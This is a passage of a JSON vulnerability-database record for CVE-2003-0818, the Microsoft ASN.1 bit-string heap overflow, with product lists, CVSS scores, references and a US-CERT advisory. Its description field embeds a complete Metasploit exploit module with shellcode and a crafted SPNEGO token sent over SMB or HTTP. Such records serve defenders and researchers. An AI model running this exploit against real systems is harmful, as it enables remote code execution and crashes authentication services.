        "vendor": "microsoft",
        "version": "20000"
      },
      {
        "model": "internet explorer sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "6.0"
      },
      {
        "model": "internet explorer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "6.0"
      },
      {
        "model": "iis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "6.0"
      },
      {
        "model": "iis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "5.1"
      },
      {
        "model": "iis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "5.0"
      },
      {
        "model": "exchange server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "exchange server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "exchange server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "exchange server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "exchange server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#583108"
      },
      {
        "db": "CERT/CC",
        "id": "VU#216324"
      },
      {
        "db": "BID",
        "id": "13300"
      },
      {
        "db": "BID",
        "id": "9633"
      },
      {
        "db": "BID",
        "id": "9635"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000037"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200403-040"
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0818"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:microsoft:windows_2000",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:microsoft:windows_nt",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:microsoft:windows_server_2003",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:microsoft:windows_xp",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000037"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Discovery of this vulnerability has been credited to eEye Digital Security.",
    "sources": [
      {
        "db": "BID",
        "id": "9633"
      },
      {
        "db": "BID",
        "id": "9635"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2003-0818",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2003-0818",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 1.9,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2003-0818",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#583108",
            "trust": 0.8,
            "value": "27.72"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#216324",
            "trust": 0.8,
            "value": "27.72"
          },
          {
            "author": "NVD",
            "id": "CVE-2003-0818",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200403-040",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2003-0818",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#583108"
      },
      {
        "db": "CERT/CC",
        "id": "VU#216324"
      },
      {
        "db": "VULMON",
        "id": "CVE-2003-0818"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000037"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200403-040"
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0818"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. Microsoft Windows ASN.1 Library (msasn1.dll) Has a vulnerability related to integer overflow. For the vulnerability, arbitrary code may be executed remotely.A third party from a distance SYSTEM May execute arbitrary code with privileges. As a result, it is possible to gain administrative privileges on vulnerable systems. The issue presents itself in the ASN.1 bit string decoding routines, specifically the BERDecBitString() function. The issue manifests when the affected function attempts to process a constructed bit string that contain another nested constructed bit string. \nThis vulnerability is exposed in a number of security related operating system components, including Kerberos (via UDP port 88), Microsoft IIS with SSL support enabled and NTLMv2 authentication (via TCP ports 135, 139 and 445).  Other components may also be affected, though a comprehensive list is not available at this time.  Client applications, which use the library, will be affected, including LSASS.EXE and CRYPT32.DLL (and any application that relies on CRYPT32.DLL).  The vulnerable library is used frequently in components that handle certificates such as Internet Explorer and Outlook.  Handling of signed ActiveX components could also present an exposure. \nIt should be noted that because ASN.1 data will likely be encoded, for example Kerberos, SSL, IPSec or Base64 encoded, the malicious integer values may be obfuscated and as a result not easily detectable. 
\nIssues related to this vulnerability were originally covered in BID 9626 and 9743, further information has been made available which identifies that this is a distinct vulnerability in the library and so this specific issue has been assigned an individual BID. \n** June 5, 2005 Update: An IRC bot style tool may be exploiting this vulnerability. This alert will be updated as further information becomes available.  This issue is related to insufficient checking of data supplied via an externally supplied length field in ASN.1 BER encoded data.  This could result in an excessive value being used in a heap allocation routine, allowing for large amounts of heap memory to be corrupted.  This could be leveraged to corrupt sensitive values in memory, resulting in execution of arbitrary code.  Exploitation of this issue will result in the corruption of heap based management structures, and may ultimately be leveraged by an attacker to have arbitrary code executed in the context of the affected process. ##\n# $Id$\n##\n\n##\n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit\n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/\n##\n\n\nrequire \u0027msf/core\u0027\n\n\nclass Metasploit3 \u003c Msf::Exploit::Remote\n\n\tinclude Msf::Exploit::Remote::SMB\n\n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\t\n\t\t\t\u0027Name\u0027           =\u003e \u0027Microsoft ASN.1 Library Bitstring Heap Overflow\u0027,\n\t\t\t\u0027Description\u0027    =\u003e %q{\n\t\t\t\tThis is an exploit for a previously undisclosed\n\t\t\t\tvulnerability in the bit string decoding code in the\n\t\t\t\tMicrosoft ASN.1 library. Both vulnerabilities were fixed in the\n\t\t\t\tMS04-007 patch. \n\n\t\t\t\tYou are only allowed one attempt with this vulnerability. 
If\n\t\t\t\tthe payload fails to execute, the LSASS system service will\n\t\t\t\tcrash and the target system will automatically reboot itself\n\t\t\t\tin 60 seconds. If the payload succeeeds, the system will no\n\t\t\t\tlonger be able to process authentication requests, denying\n\t\t\t\tall attempts to login through SMB or at the console. A\n\t\t\t\treboot is required to restore proper functioning of an\n\t\t\t\texploited system. \n\t\t\t\t\n\t\t\t\tThis exploit has been successfully tested with the win32/*/reverse_tcp\n\t\t\t\tpayloads, however a few problems were encounted when using the\n\t\t\t\tequivalent bind payloads. Your mileage may vary. \n\t\t\t\t\t\n\t\t\t},\n\t\t\t\u0027Author\u0027         =\u003e [ \u0027Solar Eclipse \u003csolareclipse@phreedom.org\u003e\u0027 ],\n\t\t\t\u0027License\u0027        =\u003e GPL_LICENSE,\n\t\t\t\u0027Version\u0027        =\u003e \u0027$Revision$\u0027,\n\t\t\t\u0027References\u0027     =\u003e\n\t\t\t\t[\n\t\t\t\t\t[ \u0027CVE\u0027, \u00272003-0818\u0027],\n\t\t\t\t\t[ \u0027OSVDB\u0027, \u00273902\u0027 ],\n\t\t\t\t\t[ \u0027BID\u0027, \u00279633\u0027],\n\t\t\t\t\t[ \u0027URL\u0027, \u0027http://www.phreedom.org/solar/exploits/msasn1-bitstring/\u0027],\n\t\t\t\t\t[ \u0027MSB\u0027, \u0027MS04-007\u0027],\n\n\t\t\t\t],\n\t\t\t\u0027DefaultOptions\u0027 =\u003e\n\t\t\t\t{\n\t\t\t\t\t\u0027EXITFUNC\u0027 =\u003e \u0027thread\u0027\n\t\t\t\t},\t\t\t\t\n\t\t\t\u0027Privileged\u0027     =\u003e true,\n\t\t\t\u0027Payload\u0027        =\u003e\n\t\t\t\t{\n\t\t\t\t\t\u0027Space\u0027    =\u003e 1024,\n\t\t\t\t\t\u0027StackAdjustment\u0027 =\u003e -3500,\n\t\t\t\t},\n\t\t\t\u0027Platform\u0027       =\u003e \u0027win\u0027,\n\t\t\t\u0027Targets\u0027        =\u003e \n\t\t\t\t[\n\t\t\t\t\t[ \n\t\t\t\t\t\t\u0027Windows 2000 SP2-SP4 + Windows XP SP0-SP1\u0027, # Tested OK - 11/25/2005 hdm (bind failed)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\u0027Platform\u0027 =\u003e 
\u0027win\u0027,\n\t\t\t\t\t\t},\n\t\t\t\t\t],\n\t\t\t\t],\n\t\t\t\u0027DisclosureDate\u0027 =\u003e \u0027Feb 10 2004\u0027,\n\t\t\t\u0027DefaultTarget\u0027 =\u003e 0))\n\t\t\t\n\t\tregister_options(\n\t\t\t[\n\t\t\t\tOptString.new(\u0027PROTO\u0027, [ true,  \"Which protocol to use: http or smb\", \u0027smb\u0027]),\n\t\t\t], self.class)\t\t\t\n\tend\n\n\t# This exploit is too destructive to use during automated exploitation. \n\t# Better Windows-based exploits exist at this time (Sep 2006)\n\tdef autofilter\n\t\tfalse\n\tend\n\n\t# This is a straight port of Solar Eclipse\u0027s \"kill-bill\" exploit, published\n\t# as a Metasploit Framework module with his permission. This module is only\n\t# licensed under GPLv2, keep this in mind if you embed the Framework into\n\t# a non-GPL application. -hdm[at]metasploit.com\n\n\tdef exploit\n\t\n\t\t# The first stage shellcode fixes the PEB pointer and cleans the heap\n\t\tstage0 = \n\t\t\t\"\\x53\\x56\\x57\\x66\\x81\\xec\\x80\\x00\\x89\\xe6\\xe8\\xed\\x00\\x00\\x00\\xff\"+\n\t\t\t\"\\x36\\x68\\x09\\x12\\xd6\\x63\\xe8\\xf7\\x00\\x00\\x00\\x89\\x46\\x08\\xe8\\xa2\"+\n\t\t\t\"\\x00\\x00\\x00\\xff\\x76\\x04\\x68\\x6b\\xd0\\x2b\\xca\\xe8\\xe2\\x00\\x00\\x00\"+\n\t\t\t\"\\x89\\x46\\x0c\\xe8\\x3f\\x00\\x00\\x00\\xff\\x76\\x04\\x68\\xfa\\x97\\x02\\x4c\"+\n\t\t\t\"\\xe8\\xcd\\x00\\x00\\x00\\x31\\xdb\\x68\\x10\\x04\\x00\\x00\\x53\\xff\\xd0\\x89\"+\n\t\t\t\"\\xc3\\x56\\x8b\\x76\\x10\\x89\\xc7\\xb9\\x10\\x04\\x00\\x00\\xf3\\xa4\\x5e\\x31\"+\n\t\t\t\"\\xc0\\x50\\x50\\x50\\x53\\x50\\x50\\xff\\x56\\x0c\\x8b\\x46\\x08\\x66\\x81\\xc4\"+\n\t\t\t\"\\x80\\x00\\x5f\\x5e\\x5b\\xff\\xe0\\x60\\xe8\\x23\\x00\\x00\\x00\\x8b\\x44\\x24\"+\n\t\t\t\"\\x0c\\x8d\\x58\\x7c\\x83\\x43\\x3c\\x05\\x81\\x43\\x28\\x00\\x10\\x00\\x00\\x81\"+\n\t\t\t\"\\x63\\x28\\x00\\xf0\\xff\\xff\\x8b\\x04\\x24\\x83\\xc4\\x14\\x50\\x31\\xc0\\xc3\"+\n\t\t\t\"\\x31\\xd2\\x64\\xff\\x32\\x64\\x89\\x22\\x31\\xdb\\xb8\\x90\\x42\\x90\\x42\\x31\"+\n\t\t\t\"\\xc9\\xb1\\x02\\x89\\xdf\\
xf3\\xaf\\x74\\x03\\x43\\xeb\\xf3\\x89\\x7e\\x10\\x64\"+\n\t\t\t\"\\x8f\\x02\\x58\\x61\\xc3\\x60\\xbf\\x20\\xf0\\xfd\\x7f\\x8b\\x1f\\x8b\\x46\\x08\"+\n\t\t\t\"\\x89\\x07\\x8b\\x7f\\xf8\\x81\\xc7\\x78\\x01\\x00\\x00\\x89\\xf9\\x39\\x19\\x74\"+\n\t\t\t\"\\x04\\x8b\\x09\\xeb\\xf8\\x89\\xfa\\x39\\x5a\\x04\\x74\\x05\\x8b\\x52\\x04\\xeb\"+\n\t\t\t\"\\xf6\\x89\\x11\\x89\\x4a\\x04\\xc6\\x43\\xfd\\x01\\x61\\xc3\\xa1\\x0c\\xf0\\xfd\"+\n\t\t\t\"\\x7f\\x8b\\x40\\x1c\\x8b\\x58\\x08\\x89\\x1e\\x8b\\x00\\x8b\\x40\\x08\\x89\\x46\"+\n\t\t\t\"\\x04\\xc3\\x60\\x8b\\x6c\\x24\\x28\\x8b\\x45\\x3c\\x8b\\x54\\x05\\x78\\x01\\xea\"+\n\t\t\t\"\\x8b\\x4a\\x18\\x8b\\x5a\\x20\\x01\\xeb\\xe3\\x38\\x49\\x8b\\x34\\x8b\\x01\\xee\"+\n\t\t\t\"\\x31\\xff\\x31\\xc0\\xfc\\xac\\x38\\xe0\\x74\\x07\\xc1\\xcf\\x0d\\x01\\xc7\\xeb\"+\n\t\t\t\"\\xf4\\x3b\\x7c\\x24\\x24\\x75\\xe1\\x8b\\x5a\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\"+\n\t\t\t\"\\x8b\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\\x01\\xe8\\x89\\x44\\x24\\x1c\\x61\\xc2\"+\n\t\t\t\"\\x08\\x00\\xeb\\xfe\"\n\n\t\ttoken = spnego_token(stage0, payload.encoded)\n\t\t\n\t\tcase datastore[\u0027PROTO\u0027]\n\t\t\twhen \u0027smb\u0027\n\t\t\t\texploit_smb(token)\n\t\t\twhen \u0027http\u0027\n\t\t\t\texploit_http(token)\n\t\t\telse\n\t\t\t\tprint_status(\"Invalid application protocol specified, use smb or http\")\n\t\tend\n\tend\n\t\n\t\n\tdef exploit_smb(token)\n\t\tconnect\n\t\t\n\t\tclient = Rex::Proto::SMB::Client.new(sock)\n\n\t\tbegin\n\t\t\tclient.session_request(smb_hostname()) if not datastore[\u0027SMBDirect\u0027]\n\t\t\tclient.negotiate\n\t\t\tclient.session_setup_ntlmv2_blob(token)\n\t\trescue =\u003e e\n\t\t\tif (e.to_s =~ /error code 0x00050001/)\n\t\t\t\tprint_status(\"The target system has already been exploited\")\n\t\t\telse\n\t\t\t\tprint_status(\"Error: #{e}\")\n\t\t\tend\n\t\tend\n\t\t\n\t\thandler\n\t\tdisconnect\n\tend\n\t\n\tdef exploit_http(token)\n\t\tconnect\n\t\t\n\t\treq = \"GET / HTTP/1.0\\r\\n\"\n\t\treq \u003c\u003c \"Host: #{ 
datastore[\u0027RHOST\u0027]}\\r\\n\"\n\t\treq \u003c\u003c \"Authorization: Negotiate #{Rex::Text.encode_base64(token, \u0027\u0027)}\\r\\n\\r\\n\"\n\n\t\tsock.put(req)\n\t\tres = sock.get_once\n\t\t\n\t\tif (res and res =~ /0x80090301/)\n\t\t\tprint_status(\"This server does not support the Negotiate protocol or has already been exploited\")\n\t\tend\n\t\t\n\t\tif (res and res =~ /0x80090304/)\n\t\t\tprint_status(\"This server responded with error code 0x80090304 (wth?)\")\n\t\tend\t\t\n\t\t\n\t\thandler\n\t\tdisconnect\n\tend\n\t\n\n\t# Returns an ASN.1 encoded string\n\tdef enc_asn1(str)\n\t\tRex::Proto::SMB::Utils::asn1encode(str)\n\tend\n\n\t# Returns an ASN.1 encoded bit string with 0 unused bits\n\tdef enc_bits(str)\n\t\t\"\\x03\" + enc_asn1(\"\\x00\" + str)\n\tend\n\n\t# Returns a BER encoded constructed bit string\n\tdef enc_constr(*str_arr)\n\t\t\"\\x23\" + enc_asn1(str_arr.join(\u0027\u0027))\n\tend\n\n\t# Returns a BER encoded SPNEGO token\n\tdef spnego_token(stage0, stage1)\n\t\t\n\t\tif !(stage0 and stage1)\n\t\t\tprint_status(\"Invalid parameters passed to spnego_token\")\n\t\t\treturn\n\t\tend\n\t\t\n\t\tif (stage0.length \u003e 1032)\n\t\t\tprint_status(\"The stage 0 shellcode is longer than 1032 bytes\")\n\t\t\treturn\n\t\tend\n\t\t\n\t\ttag = \"\\x90\\x42\\x90\\x42\\x90\\x42\\x90\\x42\"\n\t\t\n\t\tif ((tag.length + stage1.length) \u003e 1033)\n\t\t\tprint_status(\"The stage 1 shellcode is too long\")\n\t\t\treturn\n\t\tend\n\t\t\n\t\t\n\t\t# The first two overwrites must succeed, so we write to an unused location\n\t\t# in the PEB block. We don\u0027t care about the values, because after this the\n\t\t# doubly linked list of free blocks is corrupted and we get to the second\n\t\t# overwrite which is more useful. 
\n\n\t\tfw = \"\\xf8\\x0f\\x01\\x00\"\t\t# 0x00010ff8\n\t\tbk = \"\\xf8\\x0f\\x01\"\n\t\t\t\t\n\t\t# The second overwrite writes the address of our shellcode into the\n\t\t# FastPebLockRoutine pointer in the PEB\n\n\t\tpeblock = \"\\x20\\xf0\\xfd\\x7f\" # FastPebLockRoutine in PEB\n\t\t\t\n\t\tbitstring = enc_constr( \n\t\t\tenc_bits(\"A\" * 1024),\n\t\t\t\"\\x03\\x00\",\n\t\t\tenc_constr(\n\t\t\t\tenc_bits(tag + stage1 + (\"B\" * (1033-(tag+stage1).length))),\n\t\t\t\tenc_constr( enc_bits(fw + bk) ),\n\t\t\t\tenc_constr(\n\t\t\t\t\tenc_bits(\"CCCC\" + peblock + stage0 + (\"C\" * (1032-stage0.length))),\n\t\t\t\t\tenc_constr(\n\t\t\t\t\t\tenc_bits(\"\\xeb\\x06\" + make_nops(6)),\n\t\t\t\t\t\tenc_bits(\"D\" * 1040)\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\t\t\n\t\ttoken = \"\\x60\" + enc_asn1(                 # Application Constructed Object\n\t\t\t\"\\x06\\x06\\x2b\\x06\\x01\\x05\\x05\\x02\" +   # SPNEGO OID\n\t\t\t\"\\xa0\" + enc_asn1(\t\t\t\t\t   # NegTokenInit (0xa0)\n\t\t\t\t\"\\x30\" + enc_asn1(\n\t\t\t\t\t\"\\xa1\" + enc_asn1(\n\t\t\t\t\t\tbitstring\n\t\t\t\t\t)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\t\t\n\t\treturn token\t\n\tend\n\nend\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nMultiple Vulnerabilities in Microsoft ASN.1 Library\n\n   Original issue date: February 10, 2004\n   Last revised: --\n   Source: US-CERT\n\n   A complete revision history is at the end of this document.  According to information from eEye Digital Security,\n   the vulnerabilities involve integer overflows and other flaws in\n   integer arithmetic. \n\n   Any application that loads the ASN.1 library could serve as an attack\n   vector. In particular, ASN.1 is used by a number of cryptographic and\n   authentication services such as digital certificates (x.509),\n   Kerberos, NTLMv2, SSL,and TLS. Both client and server systems are\n   affected. The Local Security Authority Subsystem (lsass.exe) and a\n   component of the CryptoAPI (crypt32.dll) use the vulnerable ASN.1\n   library. 
\n\nSolution\n\nApply a patch\n\n   Apply the appropriate patch as specified by Microsoft Security\n   Bulletin MS04-007. \n\nVendor Information\n\n   This appendix contains information provided by vendors. When vendors\n   report new information, this section is updated and the changes are\n   noted in the revision history. If a vendor is not listed below, we\n   have not received their comments. \n\nMicrosoft\n\n     Please see Microsoft Security Bulletin MS04-007. \n\nReferences\n\n     * Vulnerability Note VU#216324 -\n       \u003chttp://www.kb.cert.org/vuls/id/216324\u003e\n     * Vulnerability Note VU#583108 -\n       \u003chttp://www.kb.cert.org/vuls/id/583108\u003e\n     * eEye Digital Security Advisory AD20040210 -\n       \u003chttp://www.eeye.com/html/Research/Advisories/AD20040210.html\u003e\n     * eEye Digital Security Advisory AD20040210-2 -\n       \u003chttp://www.eeye.com/html/Research/Advisories/AD20040210-2.html\u003e\n     * Microsoft Security Bulletin MS04-007 -\n       \u003chttp://microsoft.com/technet/security/bulletin/MS04-007.asp\u003e\n     * Microsoft Knowledge Base Article 252648 -\n       \u003chttp://support.microsoft.com/default.aspx?scid=252648\u003e\n     _________________________________________________________________\n\n   These vulnerabilities were researched and reported by eEye Digital\n   Security. Information from eEye and Microsoft was used in this\n   document. \n     _________________________________________________________________\n\n   Feedback can be directed to the author, Art Manion. \n\n   Copyright 2004 Carnegie Mellon University. \n\n   Revision History\n\n   February 10, 2004: Initial release\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.1 (GNU/Linux)\n\niD8DBQFAKVrdXlvNRxAkFWARAuOvAJwL2gJJPBRdrtZ0Le4yyLQLu7CHewCgvaCW\n5hU8LQ/oOC4sI8PpnkppCyg=\n=Oe/N\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2003-0818"
      },
      {
        "db": "CERT/CC",
        "id": "VU#583108"
      },
      {
        "db": "CERT/CC",
        "id": "VU#216324"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000037"
      },
      {
        "db": "BID",
        "id": "13300"
      },
      {
        "db": "BID",
        "id": "9633"
      },
      {
        "db": "BID",
        "id": "9635"
      },
      {
        "db": "VULMON",
        "id": "CVE-2003-0818"
      },
      {
        "db": "PACKETSTORM",
        "id": "83044"
      },
      {
        "db": "PACKETSTORM",
        "id": "32667"
      }
    ],
    "trust": 4.14
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=153",
        "trust": 0.3,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2003-0818"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#583108",
        "trust": 4.0
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0818",
        "trust": 3.5
      },
      {
        "db": "CERT/CC",
        "id": "VU#216324",
        "trust": 2.9
      },
      {
        "db": "USCERT",
        "id": "TA04-041A",
        "trust": 2.6
      },
      {
        "db": "BID",
        "id": "13300",
        "trust": 1.2
      },
      {
        "db": "BID",
        "id": "9635",
        "trust": 1.1
      },
      {
        "db": "XF",
        "id": "15039",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000037",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200403-040",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "9633",
        "trust": 0.3
      },
      {
        "db": "EXPLOIT-DB",
        "id": "153",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2003-0818",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "83044",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "32667",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#583108"
      },
      {
        "db": "CERT/CC",
        "id": "VU#216324"
      },
      {
        "db": "VULMON",
        "id": "CVE-2003-0818"
      },
      {
        "db": "BID",
        "id": "13300"
      },
      {
        "db": "BID",
        "id": "9633"
      },
      {
        "db": "BID",
        "id": "9635"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000037"
      },
      {
        "db": "PACKETSTORM",
        "id": "83044"
      },
      {
        "db": "PACKETSTORM",
        "id": "32667"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200403-040"
      },
      {
        "db": "NVD",
        "id": "CVE-2003-0818"
      }
    ]
  },
  "id": "VAR-200403-0051",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 1.0
  },
  "last_update_date": "2024-08-14T12:57:20.421000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "MS04-007",
        "trust": 0.8,
        "url": "http://www.microsoft.com/technet/security/bulletin/MS04-007.mspx"
      },
      {
        "title": "MS04-007",
        "trust": 0.8,
        "url": "http://www.microsoft.com/japan/technet/security/bulletin/MS04-007.mspx"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/nitishbadole/oscp-note-2"
      },
      {
        "title": "OSCP",
        "trust": 0.1,
        "url": "https://github.com/H3n2yk/OSCP"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/rmsbpro/rmsbpro"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2003-0818"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000037"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2003-0818"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.2,
        "url": "http://www.kb.cert.org/vuls/id/583108"
      },
      {
        "trust": 2.5,
        "url": "http://www.us-cert.gov/cas/techalerts/ta04-041a.html"
      },
      {
        "trust": 2.0,
        "url": "http://www.kb.cert.org/vuls/id/216324"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=ntbugtraq\u0026m=107650972617367\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=bugtraq\u0026m=107643892224825\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=bugtraq\u0026m=107643836125615\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "http://marc.info/?l=ntbugtraq\u0026m=107650972723080\u0026w=2"
      },
      {
        "trust": 1.7,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a799"
      },
      {
        "trust": 1.7,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a797"
      },
      {
        "trust": 1.7,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a796"
      },
      {
        "trust": 1.7,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a653"
      },
      {
        "trust": 1.7,
        "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2004/ms04-007"
      },
      {
        "trust": 1.6,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms04-007.asp"
      },
      {
        "trust": 1.6,
        "url": "http://support.microsoft.com/default.aspx?scid=252648"
      },
      {
        "trust": 1.6,
        "url": "http://www.itu.int/itu-t/asn1/"
      },
      {
        "trust": 1.6,
        "url": "http://www.asn1.org/"
      },
      {
        "trust": 1.4,
